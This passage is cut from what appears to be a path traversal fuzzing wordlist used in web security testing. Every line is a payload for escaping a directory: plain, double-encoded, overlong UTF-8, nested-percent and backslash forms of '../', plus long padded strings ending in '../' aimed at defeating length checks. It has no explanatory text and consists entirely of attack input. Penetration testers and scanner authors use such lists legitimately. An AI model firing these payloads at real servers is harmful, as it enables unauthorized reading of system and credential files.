 45 | ..%252f..%252f..%252f..%252f..%252f..%252f
 46 | ..%252f..%252f..%252f..%252f..%252f..%252f..%252f
 47 | ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
 48 | %252e%252e/
 49 | %252e%252e/%252e%252e/
 50 | %252e%252e/%252e%252e/%252e%252e/
 51 | %252e%252e/%252e%252e/%252e%252e/%252e%252e/
 52 | %252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/
 53 | %252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/
 54 | %252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/
 55 | %252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/
 56 | %252e%252e%252f
 57 | %252e%252e%252f%252e%252e%252f
 58 | %252e%252e%252f%252e%252e%252f%252e%252e%252f
 59 | %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
 60 | %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
 61 | %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
 62 | %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
 63 | %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
 64 | ..\
 65 | ..\..\
 66 | ..\..\..\
 67 | ..\..\..\..\
 68 | ..\..\..\..\..\
 69 | ..\..\..\..\..\..\
 70 | ..\..\..\..\..\..\..\
 71 | ..\..\..\..\..\..\..\..\
 72 | ..%255c
 73 | ..%255c..%255c
 74 | ..%255c..%255c..%255c
 75 | ..%255c..%255c..%255c..%255c
 76 | ..%255c..%255c..%255c..%255c..%255c
 77 | ..%255c..%255c..%255c..%255c..%255c..%255c
 78 | ..%255c..%255c..%255c..%255c..%255c..%255c..%255c
 79 | ..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c
 80 | ..%5c..%5c
 81 | ..%5c..%5c..%5c
 82 | ..%5c..%5c..%5c..%5c
 83 | ..%5c..%5c..%5c..%5c..%5c
 84 | ..%5c..%5c..%5c..%5c..%5c..%5c
 85 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c
 86 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
 87 | %2e%2e\
 88 | %2e%2e\%2e%2e\
 89 | %2e%2e\%2e%2e\%2e%2e\
 90 | %2e%2e\%2e%2e\%2e%2e\%2e%2e\
 91 | %2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\
 92 | %2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\
 93 | %2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\
 94 | %2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\
 95 | %2e%2e%5c
 96 | %2e%2e%5c%2e%2e%5c
 97 | %2e%2e%5c%2e%2e%5c%2e%2e%5c
 98 | %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
 99 | %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
100 | %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
101 | %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
102 | %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
103 | %252e%252e\
104 | %252e%252e\%252e%252e\
105 | %252e%252e\%252e%252e\%252e%252e\
106 | %252e%252e\%252e%252e\%252e%252e\%252e%252e\
107 | %252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\
108 | %252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\
109 | %252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\
110 | %252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\
111 | %252e%252e%255c
112 | %252e%252e%255c%252e%252e%255c
113 | %252e%252e%255c%252e%252e%255c%252e%252e%255c
114 | %252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c
115 | %252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c
116 | %252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c
117 | %252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c
118 | %252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c
119 | ..%c0%af
120 | ..%c0%af..%c0%af
121 | ..%c0%af..%c0%af..%c0%af
122 | ..%c0%af..%c0%af..%c0%af..%c0%af
123 | ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
124 | ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
125 | ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
126 | ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
127 | %c0%ae%c0%ae/
128 | %c0%ae%c0%ae/%c0%ae%c0%ae/
129 | %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/
130 | %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/
131 | %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/
132 | %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/
133 | %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/
134 | %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/
135 | %c0%ae%c0%ae%c0%af
136 | %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
137 | %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
138 | %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
139 | %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
140 | %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
141 | %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
142 | %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
143 | ..%25c0%25af
144 | ..%25c0%25af..%25c0%25af
145 | ..%25c0%25af..%25c0%25af..%25c0%25af
146 | ..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af
147 | ..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af
148 | ..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af
149 | ..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af
150 | ..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af
151 | %25c0%25ae%25c0%25ae/
152 | %25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/
153 | %25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/
154 | %25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/
155 | %25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/
156 | %25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/
157 | %25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/
158 | %25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/
159 | %25c0%25ae%25c0%25ae%25c0%25af
160 | %25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af
161 | %25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af
162 | %25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af
163 | %25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af
164 | %25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af
165 | %25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af
166 | %25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af
167 | ..%c1%9c
168 | ..%c1%9c..%c1%9c
169 | ..%c1%9c..%c1%9c..%c1%9c
170 | ..%c1%9c..%c1%9c..%c1%9c..%c1%9c
171 | ..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c
172 | ..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c
173 | ..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c
174 | ..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c
175 | %c0%ae%c0%ae\
176 | %c0%ae%c0%ae\%c0%ae%c0%ae\
177 | %c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\
178 | %c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\
179 | %c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\
180 | %c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\
181 | %c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\
182 | %c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\
183 | %c0%ae%c0%ae%c1%9c
184 | %c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c
185 | %c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c
186 | %c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c
187 | %c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c
188 | %c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c
189 | %c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c
190 | %c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c
191 | ..%25c1%259c
192 | ..%25c1%259c..%25c1%259c
193 | ..%25c1%259c..%25c1%259c..%25c1%259c
194 | ..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c
195 | ..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c
196 | ..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c
197 | ..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c
198 | ..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c
199 | %25c0%25ae%25c0%25ae\
200 | %25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\
201 | %25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\
202 | %25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\
203 | %25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\
204 | %25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\
205 | %25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\
206 | %25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\
207 | %25c0%25ae%25c0%25ae%25c1%259c
208 | %25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c
209 | %25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c
210 | %25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c
211 | %25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c
212 | %25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c
213 | %25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c
214 | %25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c
215 | ..%%32%66
216 | ..%%32%66..%%32%66
217 | ..%%32%66..%%32%66..%%32%66
218 | ..%%32%66..%%32%66..%%32%66..%%32%66
219 | ..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
220 | ..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
221 | ..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
222 | ..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
223 | %%32%65%%32%65/
224 | %%32%65%%32%65/%%32%65%%32%65/
225 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
226 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
227 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
228 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
229 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
230 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
231 | %%32%65%%32%65%%32%66
232 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
233 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
234 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
235 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
236 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
237 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
238 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
239 | ..%%35%63
240 | ..%%35%63..%%35%63
241 | ..%%35%63..%%35%63..%%35%63
242 | ..%%35%63..%%35%63..%%35%63..%%35%63
243 | ..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
244 | ..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
245 | ..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
246 | ..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
247 | %%32%65%%32%65/
248 | %%32%65%%32%65/%%32%65%%32%65/
249 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
250 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
251 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
252 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
253 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
254 | %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
255 | %%32%65%%32%65%%35%63
256 | %%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
257 | %%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
258 | %%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
259 | %%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
260 | %%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
261 | %%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
262 | %%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
263 | /\../
264 | /\../\../
265 | /\../\../\../
266 | /\../\../\../\../
267 | /\../\../\../\../\../
268 | /\../\../\../\../\../\../
269 | /\../\../\../\../\../\../\../
270 | /\../\../\../\../\../\../\../\../
271 | /..\
272 | /..\/..\
273 | /..\/..\/..\
274 | /..\/..\/..\/..\
275 | /..\/..\/..\/..\/..\
276 | /..\/..\/..\/..\/..\/..\
277 | /..\/..\/..\/..\/..\/..\/..\
278 | /..\/..\/..\/..\/..\/..\/..\/..\
279 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../
280 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../
281 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../
